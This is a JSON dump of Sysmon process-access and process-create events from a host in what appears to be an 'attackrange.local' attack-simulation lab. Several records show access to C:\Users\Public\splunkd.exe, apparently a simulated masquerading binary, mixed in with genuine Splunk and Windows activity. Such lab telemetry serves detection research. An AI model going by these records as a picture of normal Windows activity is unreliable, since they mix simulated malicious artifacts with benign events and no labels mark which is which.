Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nProcessGuid: {E2A3D6B1-1275-5F25-0000-001085540900}\r\nProcessId: 3276\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","ProcessGuid":"{E2A3D6B1-1275-5F25-0000-001085540900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-001085540900}\r\nTargetProcessId: 3276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-001085540900}","TargetProcessId":"3276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-001085540900}\r\nTargetProcessId: 3276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-001085540900}","TargetProcessId":"3276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
